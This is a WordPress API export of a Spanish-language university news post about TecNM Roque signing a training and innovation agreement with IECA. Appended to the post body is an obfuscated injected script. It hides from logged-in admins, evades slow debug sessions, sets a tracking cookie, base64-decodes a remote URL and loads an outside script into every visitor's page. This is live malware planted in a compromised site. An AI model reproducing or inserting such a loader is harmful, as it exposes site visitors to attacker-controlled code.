{"id":7248,"date":"2024-06-05T14:14:56","date_gmt":"2024-06-05T20:14:56","guid":{"rendered":"https:\/\/roque.tecnm.mx\/?p=7248"},"modified":"2025-12-16T19:39:53","modified_gmt":"2025-12-17T01:39:53","slug":"tecnm-firma-convenio-marco-con-ieca-para-impulsar-la-innovacion-y-capacitacion","status":"publish","type":"post","link":"https:\/\/roque.tecnm.mx\/?p=7248","title":{"rendered":"TecNM Firma Convenio Marco con IECA para Impulsar la Innovaci\u00f3n y Capacitaci\u00f3n"},"content":{"rendered":"\n[et_pb_section fb_built=\u00bb1&#8243; theme_builder_area=\u00bbpost_content\u00bb _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb da_is_popup=\u00bboff\u00bb da_exit_intent=\u00bboff\u00bb da_has_close=\u00bbon\u00bb da_alt_close=\u00bboff\u00bb da_dark_close=\u00bboff\u00bb da_not_modal=\u00bbon\u00bb da_is_singular=\u00bboff\u00bb da_with_loader=\u00bboff\u00bb da_has_shadow=\u00bbon\u00bb da_disable_devices=\u00bboff|off|off\u00bb][et_pb_row _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb theme_builder_area=\u00bbpost_content\u00bb][et_pb_column _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb type=\u00bb4_4&#8243; theme_builder_area=\u00bbpost_content\u00bb][et_pb_text _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb theme_builder_area=\u00bbpost_content\u00bb hover_enabled=\u00bb0&#8243; sticky_enabled=\u00bb0&#8243;]<p style=\"text-align: justify;\"><strong>11 de marzo 2024. Roque, Celaya, Gto. <\/strong>Hoy, en una ceremonia celebrada en el Parque de Innovaci\u00f3n AGROBIOTEC, nuestra Directora se uni\u00f3 a la firma de un convenio marco con el Instituto Estatal de Capacitaci\u00f3n (IECA). Este importante acuerdo marca el inicio de una colaboraci\u00f3n prometedora que beneficiar\u00e1 a ambas instituciones y a la comunidad en general.<\/p>\n<p style=\"text-align: justify;\">El convenio tiene como objetivo fortalecer la capacitaci\u00f3n y la innovaci\u00f3n en el \u00e1mbito agrobiotecnol\u00f3gico, combinando los recursos y conocimientos del TecNM y del IECA. Esta alianza estrat\u00e9gica permitir\u00e1 desarrollar programas conjuntos de formaci\u00f3n, investigaci\u00f3n y desarrollo tecnol\u00f3gico, contribuyendo significativamente al avance del sector agropecuario.<\/p>\n<p style=\"text-align: justify;\">La Directora del TecNM expres\u00f3 su entusiasmo por esta nueva etapa de colaboraci\u00f3n, destacando la importancia de trabajar en conjunto para fomentar el desarrollo sostenible y la innovaci\u00f3n en el campo. \u00abEste convenio nos permitir\u00e1 ampliar nuestras capacidades y ofrecer mayores oportunidades de capacitaci\u00f3n y desarrollo a nuestros estudiantes y profesionales del sector\u00bb, afirm\u00f3.<\/p>\n<p style=\"text-align: justify;\">Por su parte, los representantes del IECA se\u00f1alaron que esta alianza es un paso crucial para mejorar la calidad de la formaci\u00f3n t\u00e9cnica y profesional en el estado, y agradecieron al TecNM por su compromiso y visi\u00f3n compartida.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/roque.tecnm.mx\/wp-content\/uploads\/2024\/06\/431478641_418577027341611_1427537702355321532_n-300x158.jpg\" width=\"300\" height=\"158\" alt=\"\" class=\"wp-image-7253 alignnone size-medium\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/><\/p>\n<p style=\"text-align: justify;\">El Parque de Innovaci\u00f3n AGROBIOTEC, un centro de vanguardia dedicado a la investigaci\u00f3n y desarrollo en biotecnolog\u00eda agr\u00edcola, ser\u00e1 el epicentro de esta colaboraci\u00f3n, proporcionando el entorno ideal para la implementaci\u00f3n de proyectos innovadores y programas de capacitaci\u00f3n avanzados.<\/p>\n<p style=\"text-align: justify;\">Esta alianza simboliza un compromiso mutuo hacia el crecimiento y la excelencia educativa, reforzando la posici\u00f3n de ambas instituciones como l\u00edderes en sus respectivos campos.\u00a0<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/roque.tecnm.mx\/wp-content\/uploads\/2024\/06\/431277285_418577020674945_373879920643380166_n-300x159.jpg\" width=\"300\" height=\"159\" alt=\"\" class=\"wp-image-7255 alignnone size-medium\" \/><\/p>\n<p style=\"text-align: justify;\">Con este convenio, TecNM y IECA se preparan para afrontar juntos los retos del futuro, apostando por la innovaci\u00f3n, la tecnolog\u00eda y la formaci\u00f3n de calidad para transformar positivamente el sector agropecuario y, en \u00faltima instancia, la sociedad en su conjunto.<\/p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]\n<script>;(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0bQ==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>11 de marzo 2024. Roque, Celaya, Gto. Hoy, en una ceremonia celebrada en el Parque de Innovaci\u00f3n AGROBIOTEC, nuestra Directora se uni\u00f3 a la firma de un convenio marco con el Instituto Estatal de Capacitaci\u00f3n (IECA). Este importante acuerdo marca el inicio de una colaboraci\u00f3n prometedora que beneficiar\u00e1 a ambas instituciones y a la comunidad [&hellip;]<\/p>\n","protected":false},"author":11,"featured_media":7249,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[12,14,13,16,7],"tags":[],"class_list":["post-7248","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-academico","category-docentes","category-estudiantes","category-institucional","category-noticias"],"_links":{"self":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts\/7248"}],"collection":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7248"}],"version-history":[{"count":4,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts\/7248\/revisions"}],"predecessor-version":[{"id":10378,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts\/7248\/revisions\/10378"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/media\/7249"}],"wp:attachment":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7248"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7248"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}